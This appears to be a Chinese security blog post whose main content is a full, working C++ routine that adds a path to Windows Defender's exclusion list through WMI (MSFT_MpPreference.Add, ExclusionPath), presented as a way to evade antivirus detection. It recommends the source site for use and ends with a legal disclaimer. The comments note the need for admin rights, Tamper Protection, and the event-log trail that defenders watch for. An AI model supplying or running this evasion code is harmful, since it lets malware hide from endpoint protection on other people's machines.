
利用 WMI and COM 绕过windows defender

鸿鹄实验室
发布2021-11-12 09:40:38

先知上曾经有人发过一篇利用windows defender排除项来免杀的文章,文章地址:

https://xz.aliyun.com/t/10317

而这个过程(连接 ROOT\Microsoft\Windows\Defender 命名空间,调用 MSFT_MpPreference 类的 Add 方法写入 ExclusionPath)也可以直接用 WMI/COM 代码实现。需要注意的是,修改 Defender 首选项要求进程以管理员权限运行,而且排除项的变更会被 Defender 记录到事件日志中,蓝队据此即可发现该行为。

代码语言:cpp
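namespace {

// Minimal owning wrapper for a COM interface pointer. The pointer is released
// exactly once when the wrapper goes out of scope, so early returns cannot leak
// and a null pointer is never Release()d. (The hand-written cleanup in the
// original called Release() on still-null pointers in the GetMethod and
// SpawnInstance failure paths, which crashes.)
template <typename T>
class ComOwner
{
public:
  ComOwner() = default;
  ~ComOwner()
  {
    if (ptr_ != nullptr)
    {
      ptr_->Release();
    }
  }
  ComOwner(const ComOwner&) = delete;
  ComOwner& operator=(const ComOwner&) = delete;

  T** put() { return &ptr_; }                  // out-parameter slot for factory calls
  T* get() const { return ptr_; }
  T* operator->() const { return ptr_; }
  explicit operator bool() const { return ptr_ != nullptr; }

private:
  T* ptr_ = nullptr;
};

// VARIANT that is VariantClear()ed on scope exit; this also frees a contained
// SAFEARRAY or BSTR.
class ScopedVariant
{
public:
  ScopedVariant() { VariantInit(&v_); }
  ~ScopedVariant() { VariantClear(&v_); }
  ScopedVariant(const ScopedVariant&) = delete;
  ScopedVariant& operator=(const ScopedVariant&) = delete;

  VARIANT* get() { return &v_; }

private:
  VARIANT v_;
};

// Fills `out` with a one-element VT_ARRAY|VT_BSTR VARIANT holding `path`.
// Returns 1 on success, 0 if the SAFEARRAY could not be created or filled.
// SafeArrayPutElement copies the BSTR, so `path` is not retained; the array is
// owned by `out` and freed by VariantClear.
INT BuildPathArray(const WCHAR* path, VARIANT* out)
{
  SAFEARRAYBOUND bound;
  bound.cElements = 1;
  bound.lLbound = 0;

  SAFEARRAY* arr = SafeArrayCreate(VT_BSTR, 1, &bound);
  if (arr == nullptr)
  {
    return 0;
  }

  // A named _bstr_t keeps the allocation alive until after the copy. The
  // original assigned a temporary _bstr_t into a VARIANT: the BSTR was freed
  // at the end of that statement, then read by SafeArrayPutElement
  // (use-after-free) and freed again by VariantClear (double free).
  _bstr_t element(path);
  LONG index = 0;
  const HRESULT hr = SafeArrayPutElement(arr, &index, element.GetBSTR());
  if (FAILED(hr))
  {
    SafeArrayDestroy(arr);
    return 0;
  }

  V_VT(out) = VT_ARRAY | VT_BSTR;
  V_ARRAY(out) = arr;
  return 1;
}

} // namespace

// Adds one path to the Windows Defender exclusion list through WMI:
// namespace ROOT\Microsoft\Windows\Defender, class MSFT_MpPreference,
// method Add, parameter ExclusionPath (string array).
//
// exclpath: NUL-terminated path to exclude, e.g. L"C:\\Temp". Must be non-null
//           and non-empty.
// Returns 1 when WMI accepted the change, 0 on any failure; a diagnostic is
// printed to stdout on failure.
//
// Security notes:
//  * Changing Defender preferences requires an elevated (administrator) token;
//    from a standard-user context the WMI calls fail with an access-denied
//    HRESULT. Tamper Protection may additionally block the change on current
//    builds.
//  * This is the exact "exclusion abuse" pattern detection engineers hunt
//    for: Defender records preference changes in its Operational event log
//    (event 5007 on current builds - verify for your target), so a process
//    calling MSFT_MpPreference.Add is high-signal telemetry.
//  * CoInitializeSecurity is process-wide and may only succeed once; when the
//    host process already configured COM security the call returns
//    RPC_E_TOO_LATE, which this function tolerates instead of failing.
//
// Example:
//   WCHAR path[] = L"C:\\Temp";
//   if (!AddDefenderExclussion(path))
//   {
//     ::wprintf(L"[-] AddDefenderExclussion has failed\n");
//   }
INT AddDefenderExclussion(WCHAR* exclpath)
{
  if (exclpath == nullptr || exclpath[0] == L'\0')
  {
    ::wprintf(L"[-] AddDefenderExclussion: exclusion path is empty\n");
    return 0;
  }

  HRESULT hr = CoInitializeEx(0, COINIT_MULTITHREADED);
  if (FAILED(hr))
  {
    ::wprintf(L"[-] CoInitializeEx has failed\n");
    return 0;
  }
  // Both S_OK and S_FALSE need a matching CoUninitialize. Declared before every
  // COM object below so it runs last, after those objects have been released.
  struct CoScope
  {
    ~CoScope() { CoUninitialize(); }
  } coScope;

  hr = CoInitializeSecurity(
    NULL,
    -1,
    NULL,
    NULL,
    RPC_C_AUTHN_LEVEL_DEFAULT,
    RPC_C_IMP_LEVEL_IMPERSONATE,
    NULL,
    EOAC_NONE,
    NULL
  );
  // RPC_E_TOO_LATE: security was already set for this process; not an error here.
  if (FAILED(hr) && hr != RPC_E_TOO_LATE)
  {
    ::wprintf(L"[-] CoInitializeSecurity has failed\n");
    return 0;
  }

  ComOwner<IWbemLocator> locator;
  hr = CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator,
                        reinterpret_cast<LPVOID*>(locator.put()));
  if (FAILED(hr) || !locator)
  {
    ::wprintf(L"[-] CoCreateInstance has failed\n");
    return 0;
  }

  // Real BSTRs (length-prefixed) instead of the original's C-style casts of
  // wide literals; named locals so they outlive every call that uses them.
  _bstr_t defenderNamespace(L"ROOT\\Microsoft\\Windows\\Defender");
  _bstr_t className(L"MSFT_MpPreference");
  _bstr_t methodName(L"Add");

  ComOwner<IWbemServices> services;
  hr = locator->ConnectServer(defenderNamespace, NULL, NULL, 0, NULL, 0, 0, services.put());
  if (FAILED(hr) || !services)
  {
    ::wprintf(L"[-] ConnectServer has failed\n");
    return 0;
  }

  hr = CoSetProxyBlanket(
    services.get(),
    RPC_C_AUTHN_WINNT,
    RPC_C_AUTHZ_NONE,
    NULL,
    RPC_C_AUTHN_LEVEL_CALL,
    RPC_C_IMP_LEVEL_IMPERSONATE,
    NULL,
    EOAC_NONE
  );
  if (FAILED(hr))
  {
    ::wprintf(L"[-] CoSetProxyBlanket has failed\n");
    return 0;
  }

  // The original never checked GetObject and dereferenced a possibly-null class
  // object on the next line.
  ComOwner<IWbemClassObject> classObject;
  hr = services->GetObject(className, 0, NULL, classObject.put(), NULL);
  if (FAILED(hr) || !classObject)
  {
    ::wprintf(L"[-] GetObject has failed %x\n", hr);
    return 0;
  }

  ComOwner<IWbemClassObject> inSignature;
  hr = classObject->GetMethod(methodName, 0, inSignature.put(), NULL);
  if (FAILED(hr) || !inSignature)
  {
    ::wprintf(L"[-] GetMethod has failed\n");
    return 0;
  }

  ComOwner<IWbemClassObject> inParams;
  hr = inSignature->SpawnInstance(0, inParams.put());
  if (FAILED(hr) || !inParams)
  {
    ::wprintf(L"[-] SpawnInstance has failed\n");
    return 0;
  }

  ScopedVariant pathList;
  if (!BuildPathArray(exclpath, pathList.get()))
  {
    ::wprintf(L"[-] SafeArray construction has failed\n");
    return 0;
  }

  // WMI copies the value on Put; pathList still owns the array afterwards.
  hr = inParams->Put(L"ExclusionPath", 0, pathList.get(), CIM_STRING | CIM_FLAG_ARRAY);
  if (FAILED(hr))
  {
    ::wprintf(L"[-] Put has failed %x\n", hr);
    return 0;
  }

  ComOwner<IWbemClassObject> outParams;
  hr = services->ExecMethod(className, methodName, 0, NULL, inParams.get(), outParams.put(), NULL);
  if (FAILED(hr))
  {
    ::wprintf(L"[-] ExecMethod has failed %x\n", hr);
    return 0;
  }

  // A successful ExecMethod only means the call was delivered. WMI reports the
  // method's own status in the uint32 "ReturnValue" out-parameter (a CIM uint32
  // surfaces as VT_I4); zero is success. The original ignored it and reported
  // success even when Defender rejected the exclusion.
  if (outParams)
  {
    ScopedVariant ret;
    hr = outParams->Get(L"ReturnValue", 0, ret.get(), NULL, NULL);
    if (SUCCEEDED(hr) && V_VT(ret.get()) == VT_I4 && V_I4(ret.get()) != 0)
    {
      ::wprintf(L"[-] MSFT_MpPreference.Add returned %d\n", V_I4(ret.get()));
      return 0;
    }
  }

  return 1;
}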

代码来自:https://stmxcsr.com/micro/

除此之外,网站还有很多其他的功能实现,推荐阅读使用。

请严格遵守网络安全法相关条例!此分享主要用于学习,切勿走上违法犯罪的不归路,一切后果自付!
